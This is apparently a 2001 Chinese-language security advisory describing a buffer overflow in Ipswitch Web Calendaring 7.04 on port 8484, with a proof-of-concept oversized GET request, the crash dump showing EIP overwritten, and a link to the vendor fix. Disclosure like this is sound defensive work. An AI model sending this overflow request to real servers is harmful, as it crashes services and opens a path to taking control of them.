Ipswitch Web Calendaring存在缓冲溢出漏洞发布时间:2001-10-13 更新时间:2001-10-13 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Ipswitch Web Calendaring 7.04详细描述 当对Web Calendar的8484端口发送超过97字节的请求时候,程序会产生缓冲溢出并EIP被覆盖。 测试代码 Sending a request like: GET /'A' x 96 HTTP/1.0 Generates: Access violation - code c0000005 (first chance) eax=07777101 ebx=00c338d8 ecx=016f99ec edx=016f99ec esi=0000007e edi=00000000 eip=61616161 esp=016f99fc ebp=61616161 61616161 ?? ??? 解决方案 下载新的版本: ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM704HF1.exe 相关信息 http://labs.defcom.com |
